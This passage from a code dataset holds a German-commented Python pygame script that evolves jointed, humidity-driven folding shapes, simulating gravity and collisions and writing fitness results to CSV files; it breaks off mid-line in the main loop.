print(fetch_production())\n","repo_name":"electricitymaps/electricitymaps-contrib","sub_path":"parsers/JP-KY.py","file_name":"JP-KY.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":3126,"dataset":"github-code","pt":"21"} +{"seq_id":"28424816052","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 28 19:30:05 2022\r\n\r\n@author: gabri\r\n\"\"\"\r\nfrom datetime import datetime\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import * #import all modules\r\nimport random\r\nimport math\r\nimport csv\r\nfrom matplotlib.animation import FuncAnimation\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\n#Settings\r\nclock = pygame.time.Clock()\r\npygame.init() #initiates pygame\r\npygame.display.set_caption(\"Evolutionärer Algorithmus V1\") #giving a name to the window\r\nlaenge = 1900\r\nbreite = 700\r\nWINDOW_SIZE = (laenge,breite) #create window\r\nscreen = pygame.display.set_mode(WINDOW_SIZE,0,32) #initiate the window\r\n\r\nzyklen = 2\r\npopulationsnum = 1\r\nfaltflaechen = 8\r\ngelenke = faltflaechen-1\r\ngelenke_hidden = faltflaechen+1\r\npopulation = []\r\npopulation2 = []\r\nstartpunkt = (500,300)\r\n\r\nobstacles = []\r\norigin = (0,0)\r\nrays = []\r\ncollision_nr = 0\r\n\r\ng = 9.81\r\nsp_list = []\r\nsp_point = (0,0)\r\ng_vectors = []\r\ny_offset = 0\r\ny_boden = 500\r\n\r\ndraw_points = []\r\nturning_angles = 0\r\n\r\nfriction_x = 0\r\nx_offset = 0 #wegen Reibung\r\nsum_laenge = 0\r\nhygroskopizität = []\r\n\r\nmutation_list = []\r\n\r\n\r\n#population nr\r\npop_nr = 0\r\npopulation_limit = 100 #Wie gross die Anfangspopulation?\r\nselection_ratio = 0.10 #Dezimal\r\n\r\n#Chart informations\r\nfps_=80\r\nplt.ion()\r\ndef plot_animation(status):\r\n try:\r\n df = pd.read_csv('Fitness.csv', index_col=0)\r\n y = df.index[1:len(df.index)]\r\n plt.plot(y,'.')\r\n plt.axis([0, len(df.index), -0.1, 3])\r\n plt.xlabel('Nr. 
Individuum')\r\n plt.ylabel('Relative Geschwindigkeit')\r\n plt.draw()\r\n if status == 1:\r\n print(\"saved\")\r\n plt.savefig('Fitness_Results.png')\r\n plt.pause(0.0001)\r\n # if i == len(df.index)-1:\r\n # print(\"saved\")\r\n # plt.savefig('foo.png')\r\n plt.clf()\r\n except:\r\n pass\r\n \r\n\r\n#Calculating number of generations\r\nanzahl = population_limit\r\ngenerations = 0\r\nwhile anzahl >= 1:\r\n generations += 1\r\n anzahl = round(anzahl*(selection_ratio)**generations)\r\n if anzahl/2 != round(anzahl/2):\r\n anzahl += 1\r\n \r\ngenerations = generations + 1 #Maximale Anzahl an Generationen bis das schnellste Objekt gefunden wurde\r\ngenerations = 60\r\nnr_in_generation = population_limit\r\n\r\n\r\n\r\n\r\ndef print_csv(list_population_nr, nummer):\r\n data = list_population_nr\r\n if nummer == 0:\r\n mode = 'a'\r\n if pop_nr == 0:\r\n mode = 'w'\r\n for i in range(len(data)):\r\n mode = 'a'\r\n if pop_nr == 0:\r\n if i == 0:\r\n mode = 'w'\r\n print(\"To csv\", data[i], mode)\r\n with open('RESULTS.csv', mode) as file:\r\n writer = csv.writer(file)\r\n writer.writerow(data[i])\r\n if i == 2:\r\n if data[i][0] >= 0:\r\n if data[i][0] < 3:\r\n with open('FITNESS.csv', mode) as file:\r\n writer = csv.writer(file)\r\n writer.writerow(data[i])\r\n else:\r\n for i in range(len(data)):\r\n for k in range(len(data[i])):\r\n if i == 0 and k == 0:\r\n mode = 'w'\r\n else:\r\n mode = 'a'\r\n with open('RESULTS.csv', mode) as file:\r\n print(data[i], mode)\r\n writer = csv.writer(file)\r\n writer.writerow(data[i][k])\r\n\r\ndef mutation_surface():\r\n random.seed(datetime.now())\r\n return(random.randint(-10,10))\r\ndef mutation_angle():\r\n random.seed(datetime.now())\r\n return(random.randint(-5,5))\r\n\r\n \r\n#########################################\r\ndef sel_reco_mut(): \r\n global population2, nr_in_generation, mutation_list\r\n in_file = open(\"RESULTS.csv\", \"r\")\r\n reader = csv.reader(in_file)\r\n mylist = list(reader)\r\n in_file.close()\r\n print(mylist)\r\n data_ex = []\r\n #print all data from csv as list\r\n for i in range(len(mylist)):\r\n if len(mylist[i]) == 0:\r\n pass\r\n elif mylist[i][0] == '':\r\n pass\r\n else:\r\n data_ex.append(mylist[i])\r\n \r\n \r\n \r\n #Selektion anhand von Fitness: beste 25% -> höher bis eine gerade Anzahl gefunden worden ist => Paarung\r\n population3 = []\r\n gene = 3\r\n for i in range(population_limit):\r\n population3.append(data_ex[i*gene:(i+1)*gene])\r\n \r\n for i in range(len(population3)):\r\n for j in range(len(population3[i])):\r\n for k in range(len(population3[i][j])):\r\n try:\r\n population3[i][j][k] = int(population3[i][j][k]) \r\n except:\r\n population3[i][j][k] = float(population3[i][j][k]) \r\n \r\n print(population3)\r\n population3 = sorted(population3, key=lambda tup: tup[2], reverse=True)\r\n \r\n print(\"sortiert: \", population3)\r\n #Achtung dass +1 weglassen\r\n \r\n selection_nr = int((len(population3))*selection_ratio)\r\n if selection_nr/2 != round(selection_nr/2):\r\n selection_nr += 1\r\n \r\n new_population = []\r\n #Algorithmus ist beendet\r\n if selection_nr == 1:\r\n print(\"finished\")\r\n plot_animation(1)\r\n pygame.quit()\r\n sys.exit()\r\n else:\r\n for i in range(selection_nr):\r\n new_population.append(population3[i])\r\n nr_in_generation = selection_nr\r\n print(\"\")\r\n print(\"Selection\", new_population)\r\n \r\n #new_population = random.sample(new_population, len(new_population)) #Liste beliebig mischen\r\n \r\n #Rekombination -> Hälfte der Genen werden ausgetauscht (für Fläche und 
Gelenke)\r\n nachwuchs = []\r\n \r\n # for i in range(int(len(new_population)/2)):\r\n # i_new = i*2 #für jedes 2er-Paar\r\n # #Gelenke\r\n # half1 = int(len(new_population[0][0])/2)\r\n # half2 = len(new_population[0][0])-int(len(new_population[0][0])/2)\r\n # # print(half1, half2)\r\n # part1 = new_population[i_new][0][0:half1]\r\n # part2 = new_population[i_new][0][half1:half1+half2]\r\n # part3 = new_population[i_new+1][0][0:half1]\r\n # part4 = new_population[i_new+1][0][half1:half1+half2]\r\n # # print(\"\")\r\n # # print(part1, part2, part3, part4)\r\n # new_population[i_new][0] = part1+part4\r\n # new_population[i_new+1][0] = part3+part2\r\n \r\n \r\n \r\n # #Flächen-Längen\r\n # half1 = int(len(new_population[0][1])/2)\r\n # half2 = len(new_population[0][1])-int(len(new_population[0][1])/2)\r\n # # print(\"Flächen:\",half1, half2)\r\n # part1 = new_population[i_new][1][0:half1]\r\n # part2 = new_population[i_new][1][half1:half1+half2]\r\n # part3 = new_population[i_new+1][1][0:half1]\r\n # part4 = new_population[i_new+1][1][half1:half1+half2]\r\n # # print(\"\")\r\n # # print(part1, part2, part3, part4)\r\n # new_population[i_new][1] = part1+part4\r\n # new_population[i_new+1][1] = part3+part2\r\n \r\n for u in range(len(new_population)): #Überbevölkerung + MUTATION\r\n kinder = 0\r\n if new_population[u][2][0] > 0.0:\r\n kinder = 1 #1 Eltern -> 1 Kinder\r\n if new_population[u][2][0] > 0.5:\r\n kinder = 8 #1 Eltern -> 1 Kinder \r\n if new_population[u][2][0] > 1.0:\r\n kinder = 10 #1 Eltern -> 2 Kinder\r\n if new_population[u][2][0] > 1.5:\r\n kinder = 12 #2 Eltern -> 5 Kinder\r\n if new_population[u][2][0] > 3:\r\n kinder = 0 #ERROR\r\n if new_population[u][2][0] <= 0.0:\r\n kinder = 0 #Rückwärts \r\n for n_kind in range(kinder): #2 Eltern werden zu 4 Kindern\r\n surfaces = []\r\n angles = []\r\n for k in range(len(new_population[u][0])):\r\n a = random.randint(-18,18)\r\n if new_population[u][0][k] + a <= 7:\r\n surfaces.append(new_population[u][0][k])\r\n else:\r\n surfaces.append(new_population[u][0][k] + a)\r\n for z in range(len(new_population[u][1])):\r\n a = random.randint(-10,10)\r\n if new_population[u][1][z] + a <= -90 or new_population[u][1][z] + a >= 90:\r\n angles.append(new_population[u][1][z])\r\n else:\r\n angles.append(new_population[u][1][z] + a)\r\n new_population[u] = [surfaces,angles,new_population[u][2]]\r\n nachwuchs.append(new_population[u])\r\n \r\n \r\n # print(\"\")\r\n # print(\"Recombination\",new_population)\r\n new_population = []\r\n new_population = nachwuchs #die Filialgeneration übernimmt, die Parentalgeneration stirbt\r\n new_population = random.sample(new_population, len(new_population)) #Liste beliebig mischen \r\n mutation_list = []\r\n print(\"#################\")\r\n print(new_population)\r\n print(\"\")\r\n # Mutation: Flächen: +/- 5 , Hygroskopizität: +/- 10\r\n \r\n new_2_population = []\r\n #Error bei Fitness-Berechnung?\r\n for i in range(len(new_population)):\r\n if new_population[i][2][0] > 3.0:\r\n \r\n pass\r\n elif new_population[i][2][0] < 0.0:\r\n \r\n pass\r\n else:\r\n new_2_population.append(new_population[i])\r\n nr_in_generation = len(new_2_population)\r\n #data = [[new_population[i][2][0]]]\r\n # with open('FITNESS.csv', 'a') as file:\r\n # writer = csv.writer(file)\r\n # writer.writerows(data)\r\n print_csv(new_2_population,1)\r\n print(\"Print to csv:\", new_2_population)\r\n population2 = new_2_population\r\n \r\n \r\n#########################################\r\ndef humidity_level(frame):\r\n i = (frame-5) * 0.05\r\n 
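The mutation loops above roll an offset and silently keep the old gene whenever the result would leave the allowed range, so boundary genes mutate less often than interior ones. Clamping to the interval is one alternative with a different bias; a sketch, with bounds taken from the snippet (surface lengths above 7, hinge values strictly inside -90..90), and the upper length bound below is an assumption:

import random

def mutate_clamped(value: int, spread: int, lo: int, hi: int) -> int:
    return max(lo, min(hi, value + random.randint(-spread, spread)))

new_length = mutate_clamped(40, 18, 8, 200)  # 200 is an assumed ceiling
new_angle = mutate_clamped(45, 10, -89, 89)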
return(round((math.sin(0.5*i-14)+1)*50,1))#\r\n\r\ndef startpopulation(populationsnum, o):\r\n global population, sum_laenge, hygroskopizität, population2\r\n if generation_nr == 1:\r\n for i in range(0,populationsnum):\r\n gelenke_pos=[]\r\n laengen=[]\r\n gelenke_hygr=[]\r\n gelenke_status = []\r\n for l in range(0,faltflaechen):\r\n laenge = random.randint(7,100)\r\n laengen.append(laenge)\r\n sum_laenge += laenge\r\n for k in range(0,gelenke_hidden):\r\n num = random.randint(-90,90)\r\n gelenke_hygr.append(num)\r\n hygroskopizität.append(num)\r\n gelenke_status.append((1,0))\r\n genotyp = (0, laengen, gelenke_hygr, gelenke_pos, gelenke_status, 0)\r\n population.append(genotyp)\r\n else:\r\n \r\n gelenke_pos=[]\r\n laengen=population2[o][0]\r\n gelenke_hygr=population2[o][1]\r\n gelenke_status = []\r\n for l in range(len(population2[o][0])):\r\n sum_laenge += population2[o][0][l]\r\n for k in range(len(population2[o][1])):\r\n hygroskopizität.append(population2[o][1][k])\r\n gelenke_status.append((1,0))\r\n genotyp = (0, laengen, gelenke_hygr, gelenke_pos, gelenke_status, 0)\r\n population.append(genotyp)\r\n print(\"Von population2 übernommen:\", population)\r\n\r\n\r\ndef collision(population_nr, origin, endpoint, flaeche_nr, frame):\r\n global collision_nr\r\n global population\r\n obstacles = population[population_nr][3]\r\n obstacle_nr = len(obstacles)-1 #1. weil die Anzahl der Paare 1 kleiner als die Anzahl Flächen ist + (2.) weil die geraden eben gemachte Fläche nicht zählt\r\n \r\n #for all starts and ends of all objects n\r\n for n in range(0,obstacle_nr):\r\n start = obstacles[n]\r\n end = obstacles[n+1]\r\n pygame.draw.line(screen, (255, 0, 0), start, end) #obstacle\r\n pos = intersect_line_line(start, end, origin, endpoint)\r\n if pos:\r\n counter = 0\r\n #benachbarte Flächen ==> dann war es doch keine Berührung\r\n if abs(n-flaeche_nr) == 1:\r\n pass\r\n else:\r\n #wirkliche Berührung\r\n #collision_nr = collision_nr + 1\r\n #print(\"collision between:\",n,flaeche_nr)\r\n pygame.draw.circle(screen, (0, 255, 0), (round(pos[0]), round(pos[1])), 3)\r\n #Gelenke zwischen den Flächen ausschalten\r\n if n < flaeche_nr:\r\n for t in range(n, flaeche_nr):\r\n #Winkel schon blockiert? 
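A quick sanity check for intersect_line_line above: the two diagonals of the square with corners (0, 0) and (2, 2) must cross at (1.0, 1.0), and parallel segments must yield None because the determinant d is zero:

assert intersect_line_line((0, 0), (2, 2), (0, 2), (2, 0)) == (1.0, 1.0)
assert intersect_line_line((0, 0), (1, 0), (0, 1), (1, 1)) is None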
If so, leave it as is.\r\n                        if population[population_nr][5][t][0] == 0:\r\n                            pass\r\n                        else:\r\n                            population[population_nr][5][t] = (0, frame)\r\n                else:\r\n                    for t in range(flaeche_nr, n):\r\n                        if population[population_nr][5][t][0] == 0:\r\n                            pass\r\n                        else:\r\n                            population[population_nr][5][t] = (0, frame)\r\n                # print(population[population_nr][5])\r\n\r\n\r\n\r\ndef intersect_line_line(P0, P1, Q0, Q1): # P is the obstacle, Q is the ray (the moving line)\r\n    d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0]) \r\n    # delta x of P * delta y of Q + delta y of P * delta x of Q\r\n    if d == 0:\r\n        return None\r\n    t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d\r\n    # delta between x of P/Q * delta y of Q + delta between y of P/Q * delta x of Q\r\n    u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d\r\n    # delta between x of P/Q * delta y of P + delta between y of P/Q * delta x of P\r\n    if 0 <= t <= 1 and 0 <= u <= 1:\r\n        return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)\r\n    return None\r\n\r\ndef sp_calc(p1, p2, k, population_nr, frame):\r\n    y_coord = p1[1] + (p2[1]-p1[1])/2\r\n    x_coord = p1[0] + (p2[0]-p1[0])/2 \r\n    # drawing the segment's center of mass (SP)\r\n    pygame.draw.circle(screen, (255, 0, 0), (x_coord, y_coord), 3)\r\n    \r\n    # calculating \"mass\"\r\n    m = math.sqrt((p2[0]-p1[0])**2 + (p2[1]-p1[1])**2)*3\r\n    l = math.sqrt((p2[0]-p1[0])**2 + (p2[1]-p1[1])**2)\r\n    if len(sp_list) == faltflaechen:\r\n        sp_list[k] = (x_coord, y_coord,l)\r\n    else:\r\n        sp_list.append((x_coord, y_coord,l))\r\n    sp()\r\n    gravity_vec(x_coord, y_coord, m,k, population_nr, frame)\r\n    \r\ndef sp():\r\n    global sp_point\r\n    x = 0\r\n    y = 0\r\n    l = 0\r\n    for i in range(len(sp_list)):\r\n        x += sp_list[i][0]*sp_list[i][2]\r\n        y += sp_list[i][1]*sp_list[i][2]\r\n        l += sp_list[i][2]\r\n    try:\r\n        pygame.draw.circle(screen, (0, 0, 255), (x/l,y/l), 5)\r\n        sp_point = (x/l,y/l)\r\n    except:\r\n        print(\"Error: DIVISION BY 0\")\r\n    \r\n    \r\ndef gravity_vec(x,y, m,k, population_nr, frame):\r\n    force_magnifier = 0.02\r\n    force = g * force_magnifier * m\r\n    # draw the individual vectors\r\n    # g_vector = pygame.draw.line(screen, (255,0,0), (x,y),(x,y+force),1)\r\n    if len(g_vectors) == faltflaechen:\r\n        g_vectors[k] = (x,y,force)\r\n        gravity_sum_vec(population_nr, frame)\r\n    else:\r\n        g_vectors.append((x,y,force))\r\n\r\ndef gravity_sum_vec(population_nr, frame):\r\n    x_sum = 0\r\n    y_sum = 0\r\n    forces_sum = 0\r\n    for i in range(len(g_vectors)):\r\n        x_sum += g_vectors[i][0]\r\n        y_sum += g_vectors[i][1]\r\n        forces_sum += g_vectors[i][2]\r\n    x_sum_avg = x_sum/len(g_vectors) # average x coordinate of the vectors (points of application)\r\n    y_sum_avg = y_sum/len(g_vectors)\r\n    forces_sum_avg = forces_sum\r\n    # g_sum_vector = pygame.draw.line(screen, (255,0,0), (x_sum_avg,y_sum_avg),(x_sum_avg,y_sum_avg+forces_sum_avg),1)\r\n    # pygame.draw.circle(screen, (0, 0, 255), (x_sum_avg,y_sum_avg), 3)\r\n    \r\n\r\ndef gravity(population_nr, frame):\r\n    global y_offset, population, startpunkt, turning_angles, friction_x, x_offset\r\n    \r\n    m, p1, p2, z1, z2 = gravity_line(population_nr)\r\n    pygame.draw.circle(screen, (0, 0, 255), p2, 3)\r\n    pygame.draw.circle(screen, (0, 0, 255), p1, 3)\r\n    \r\n    objekt_nr = population_nr\r\n    # rotate the whole object around the \"grounded\" point by an angle\r\n    alpha = math.degrees(math.atan(m))\r\n    alpha = math.radians(alpha)\r\n    turning_angles = alpha\r\n    ################################################\r\n    \r\n    # print(\"before:\", frame, population[population_nr][3])\r\n    if m > 0: # NOTE (remark from the original author): this should really be 
m < 0\r\n        # print(\"m = POSITIVE\")\r\n        if type(friction_x) == int:\r\n            friction_x = (p1[0], z1)\r\n        elif friction_x[1] == z1:\r\n            x_offset = friction_x[0]-p1[0]\r\n        else:\r\n            friction_x = (p1[0], z1)\r\n        \r\n        draw_points[z1]=p1\r\n        \r\n        # REAL Y_OFFSET\r\n        y_min = p1[1]\r\n        if y_min < y_boden:\r\n            y_offset = abs(y_boden-y_min)\r\n        else:\r\n            y_offset = -1*abs(y_boden-y_min)\r\n        \r\n        # move the object onto the ground\r\n        startpunkt = (startpunkt[0], startpunkt[1]+y_offset)\r\n        for u in range(len(population[population_nr][3])):\r\n            population[population_nr][3][u] = (population[population_nr][3][u][0],population[population_nr][3][u][1]+y_offset)\r\n        \r\n        for t in range(len(population[objekt_nr][3])):\r\n            # distance between P1 and the other point Pn\r\n            r = math.sqrt((population[objekt_nr][3][t][0]-p1[0])**2+(population[objekt_nr][3][t][1]-p1[1])**2)\r\n            if r == 0:\r\n                pass\r\n            else:\r\n                # rotation by alpha\r\n                # x = 1*population[objekt_nr][3][t][0]*math.cos(alpha) - population[objekt_nr][3][t][1]*math.sin(alpha)\r\n                # y = 1*population[objekt_nr][3][t][0]*math.sin(alpha) + population[objekt_nr][3][t][1]*math.cos(alpha)\r\n                x_2 = population[population_nr][3][t][0]\r\n                y_2 = population[population_nr][3][t][1]\r\n                x_1 = p1[0]\r\n                y_1 = p1[1]\r\n                \r\n                if x_1 == x_2:\r\n                    # this point is the rotation center, so its coordinates stay the same\r\n                    pass\r\n                else:\r\n                    m3 = (y_1-y_2)/(x_2-x_1)\r\n                    if population[population_nr][3][t][0] > p1[0]:\r\n                        beta = math.degrees(math.atan(m3))\r\n                        beta = math.radians(beta)\r\n                        x = p1[0]+r*math.cos(beta-alpha)\r\n                        y = p1[1]-r*math.sin(beta-alpha)\r\n                        # turn(x,y,t, population_nr, frame)\r\n                    else:    \r\n                        beta = math.degrees(math.atan(m3))\r\n                        beta = math.radians(beta)\r\n                        x = p1[0]+r*math.cos(beta-alpha+math.radians(180))\r\n                        y = p1[1]-r*math.sin(beta-alpha+math.radians(180))\r\n                        # turn(x,y,t, population_nr, frame)\r\n                # c = 300\r\n                # pygame.draw.line(screen, (255, 0, 255), (p1[0],p1[1]), (p1[0]+c,p1[1]-m*c), 6)\r\n                if t == 0:\r\n                    pygame.draw.circle(screen, (255,0,0), (x,y), 3)\r\n                else:\r\n                    pygame.draw.circle(screen, (255,0,255), (x,y), 3)\r\n                if t > z1:\r\n                    draw_points[t] = (x,y)\r\n                elif t == z1:\r\n                    pass\r\n                else:\r\n                    draw_points[t] = (x,y)\r\n        \r\n    else:\r\n        # print(\"m = NEGATIVE\")\r\n        if type(friction_x) == int:\r\n            friction_x = (p2[0], z2)\r\n        elif friction_x[1] == z2:\r\n            x_offset = friction_x[0]-p2[0]\r\n        else:\r\n            friction_x = (p2[0], z2)\r\n        draw_points[z2]=p2\r\n        \r\n        # REAL Y_OFFSET\r\n        y_min = p2[1]\r\n        if y_min < y_boden:\r\n            y_offset = abs(y_boden-y_min)\r\n        else:\r\n            y_offset = -1*abs(y_boden-y_min)\r\n        \r\n        # move the object onto the ground\r\n        startpunkt = (startpunkt[0], startpunkt[1]+y_offset)\r\n        for u in range(len(population[population_nr][3])):\r\n            population[population_nr][3][u] = (population[population_nr][3][u][0],population[population_nr][3][u][1]+y_offset)\r\n        \r\n        for t in range(len(population[objekt_nr][3])):\r\n            # distance between P2 and the other point Pn\r\n            r = math.sqrt((population[objekt_nr][3][t][0]-p2[0])**2+(population[objekt_nr][3][t][1]-p2[1])**2)\r\n            if r == 0:\r\n                pass\r\n            else:\r\n                # rotation by alpha\r\n                x_2 = population[population_nr][3][t][0]\r\n                y_2 = population[population_nr][3][t][1]\r\n                x_1 = p2[0]\r\n                y_1 = p2[1]\r\n                if x_1 == x_2:\r\n                    # this point is the rotation center, so its coordinates stay the same\r\n                    pass\r\n                else:\r\n                    m3 = (y_1-y_2)/(x_2-x_1)\r\n                    if population[population_nr][3][t][0] > p2[0]:\r\n                        beta = math.degrees(math.atan(m3))\r\n                        beta = math.radians(beta)\r\n                        x = 
p2[0]+r*math.cos(beta-alpha)\r\n                        y = p2[1]-r*math.sin(beta-alpha)\r\n                        # turn(x,y,t, population_nr, frame)\r\n                    else:    \r\n                        beta = math.degrees(math.atan(m3))\r\n                        beta = math.radians(beta)\r\n                        x = p2[0]+r*math.cos(beta-alpha+math.radians(180))\r\n                        y = p2[1]-r*math.sin(beta-alpha+math.radians(180))\r\n                        # turn(x,y,t, population_nr, frame)\r\n                # c = 300\r\n                # pygame.draw.line(screen, (255, 0, 255), (p1[0],p1[1]), (p1[0]+c,p1[1]-m*c), 6)\r\n                if t == 0:\r\n                    pygame.draw.circle(screen, (255,0,0), (x,y), 3)\r\n                else:\r\n                    pygame.draw.circle(screen, (255,0,255), (x,y), 3)\r\n                if t > z2:\r\n                    draw_points[t] = (x,y)\r\n                elif t == z2:\r\n                    pass\r\n                else:\r\n                    draw_points[t] = (x,y)\r\n        \r\n        # print(x,y, r, beta)\r\n    # print(\"after:\", frame, population[population_nr][3])\r\n    # print(frame, draw_points)\r\n    \r\n    # population[population_nr] = (population[population_nr][0],population[population_nr][1],population[population_nr][2],draw_points, population[population_nr][4], population[population_nr][5],population[population_nr][6])\r\n    \r\n\r\ndef turn(x,y,n, population_nr, frame):\r\n    global population, startpunkt, draw_points\r\n    if frame > 10:\r\n        if n == 0:\r\n            population[population_nr][3][n] = (x,y)\r\n        if n == 1:\r\n            population[population_nr][3][n] = (x,y)\r\n    draw_points.append((x,y))\r\n    pass\r\n\r\n    ########################################################\r\n\r\ndef gravity_line(population_nr):\r\n    global population, sp_point\r\n    Gelenke_Koordinaten_Liste = population[population_nr][3]\r\n    rechts_von_S = []\r\n    links_von_S = []\r\n    a,b = (0,0), (0,0)\r\n    for i in range(len(Gelenke_Koordinaten_Liste)):\r\n        if Gelenke_Koordinaten_Liste[i][0] > sp_point[0]:\r\n            rechts_von_S.append(Gelenke_Koordinaten_Liste[i])\r\n        else:\r\n            links_von_S.append(Gelenke_Koordinaten_Liste[i])\r\n    switch = 1\r\n    while switch == 1:\r\n        # candidate support line\r\n        m2 = 0\r\n        for p1 in range(len(links_von_S)):\r\n            for p2 in range(len(rechts_von_S)):\r\n                # determine m and q:\r\n                x1 = links_von_S[p1][0]\r\n                y1 = links_von_S[p1][1]\r\n                x2 = rechts_von_S[p2][0]\r\n                y2 = rechts_von_S[p2][1]\r\n                \r\n                m = (y2-y1)/(x2-x1)\r\n                m2 = (y1-y2)/(x2-x1)\r\n                q = y1 - m*x1\r\n                \r\n                counter = 0\r\n                \r\n                # if no point lies below the line -> done -> break?\r\n                for z in range(len(Gelenke_Koordinaten_Liste)):\r\n                    x3 = Gelenke_Koordinaten_Liste[z][0]\r\n                    y3 = Gelenke_Koordinaten_Liste[z][1]\r\n                    # if a point lies below the line:\r\n                    if round(y3,1) > round((m*x3 + q),1):\r\n                        # print(\"con:\",round(y3,1),round((m*x3 + q),1), round((m*x3 + q),1)-round(y3,1))\r\n                        # keep searching\r\n                        pass\r\n                    else:\r\n                        # line (m, q) and joints (p1, p2) found: \r\n                        counter += 1\r\n                        pass\r\n                    \r\n                if counter == len(Gelenke_Koordinaten_Liste):\r\n                    # joints that touch the ground\r\n                    pygame.draw.line(screen, (255,0,0), (links_von_S[p1][0],links_von_S[p1][1]),(rechts_von_S[p2][0],rechts_von_S[p2][1]),1)\r\n                    a = (links_von_S[p1][0],links_von_S[p1][1])\r\n                    b = (rechts_von_S[p2][0],rechts_von_S[p2][1])\r\n                    # gravity((links_von_S[p1][0],links_von_S[p1][1]),(rechts_von_S[p2][0],rechts_von_S[p2][1]),m, population_nr, frame_nr)\r\n                    # which joint index in the joint list\r\n                    z1, z2 = p1, len(links_von_S)+p2\r\n                    return m2, a, b, z1, z2\r\n                    switch = 0\r\n                else:\r\n                    pass\r\n    \r\n\r\ndef boden(laenge, breite):\r\n    pygame.draw.line(screen, (0,0,0), (0, y_boden),(laenge,y_boden),3)\r\n\r\ndef draw_gelenke(x,y):\r\n    pygame.draw.circle(screen, (0, 0, 0), (x,y), 4)\r\n    \r\n\r\ndef draw(population_nr, frame):\r\n    global population, draw_points, turning_angles, x_offset\r\n    
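# recompute every joint position for the current frame, then draw the surfaces and joints and check for collisions\r\n    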
gelenke_pos = []\r\n    gelenke_collision = []\r\n    gelenke_winkel = []\r\n    \r\n    if frame == 1:\r\n        gelenke_pos.append(startpunkt)\r\n        status = population[population_nr][4]\r\n    else:\r\n        gelenke_pos.append(population[population_nr][3][0])\r\n        status = population[population_nr][5]\r\n    \r\n    # for all surfaces of an object\r\n    for k in range(len(population[population_nr][1])): \r\n        # (the first surface is handled the same way as the rest)\r\n        \r\n        # bending of the joints? => locked or not?\r\n        if status[k-1][0] == 1:\r\n            alpha = population[population_nr][2][k-1]*(humidity_level(frame)/100)\r\n        else:\r\n            # angle is locked!\r\n            frame2 = status[k-1][1]\r\n            # release the angle lock?\r\n            num = int(frame / 252)\r\n            if 252-(frame2-num*252) < frame-num*252:\r\n                alpha = population[population_nr][2][k-1]*(humidity_level(frame)/100)\r\n                status[k-1] = (1, 0)\r\n            else:\r\n                # still locked\r\n                alpha = population[population_nr][2][k-1]*(humidity_level(frame2)/100)\r\n        \r\n        P1x = gelenke_pos[-1][0]\r\n        P1y = gelenke_pos[-1][1]\r\n        \r\n        P2x = math.cos(math.radians(alpha))*population[population_nr][1][k] # -beta\r\n        P2y = math.sin(math.radians(alpha))*population[population_nr][1][k] # -beta\r\n        # the position of point n is computed from the previous point n-1 and appended to the joint list\r\n        gelenke_pos.append((P1x+P2x,P1y-P2y))\r\n        # the joint and the surface are drawn\r\n        draw_gelenke(P1x+P2x,P1y-P2y)\r\n        pygame.draw.line(screen, (0,0,0), (P1x,P1y),(P1x+P2x,P1y-P2y),3) # surface, color, p1, p2, width\r\n        \r\n        # last surface added => done\r\n        if k+1 == faltflaechen:\r\n            fitness = 0\r\n            if frame > 6:\r\n                fitness_evaluation = []\r\n                for o in range(len(population[population_nr][3])):\r\n                    fitness_evaluation.append(population[population_nr][3][o][0])\r\n                \r\n                fitness = round((max(fitness_evaluation)-startpunkt[0]-sum_laenge)/frame,3)\r\n                if population[population_nr][6] > fitness:\r\n                    fitness = population[population_nr][6]\r\n                else:\r\n                    pass\r\n            population[population_nr] = (population[population_nr][0],population[population_nr][1],population[population_nr][2],gelenke_pos, gelenke_collision, status,fitness)\r\n            if frame == zyklen*252-2:\r\n                print(\"Print to csv:\",population[population_nr][1])\r\n                print(\"AND:\", [population[population_nr][6]])\r\n                fitness2 = [population[population_nr][6]]\r\n                print_csv([population[population_nr][1],hygroskopizität,fitness2],0)\r\n    \r\n    # checking for collision\r\n    for k in range(len(population[population_nr][3])-1):\r\n        x1 = population[population_nr][3][k][0]\r\n        y1 = population[population_nr][3][k][1]\r\n        x2 = population[population_nr][3][k+1][0]\r\n        y2 = population[population_nr][3][k+1][1]\r\n        collision(population_nr, (x1,y1),(x2,y2), k, frame)\r\n        # compute the center of mass\r\n        sp_calc((x1,y1),(x2,y2),k, population_nr, frame)\r\n    \r\n    if frame > 5:\r\n        draw_points=[]\r\n        for i in range(faltflaechen+1):\r\n            draw_points.append(\" \")\r\n        gravity(population_nr, frame)\r\n        try:\r\n            for i in range(len(draw_points)):\r\n                population[population_nr][3][i] = (draw_points[i][0]+x_offset, draw_points[i][1])\r\n                population[population_nr][2][i] = population[population_nr][2][i]-math.degrees(turning_angles)\r\n        except:\r\n            pass\r\n    # print(population[population_nr])\r\n\r\n##################################\r\n# MAIN LOOP\r\ngeneration_nr = 0\r\nprint(generations)\r\nwhile generation_nr < generations:\r\n    generation_nr += 1\r\n    if generation_nr == 1:\r\n        population_limit = population_limit # keep the configured limit for the first generation\r\n    else:\r\n        population_limit = nr_in_generation\r\n    for i in range(population_limit):\r\n        print(\"Generation\",generation_nr, 
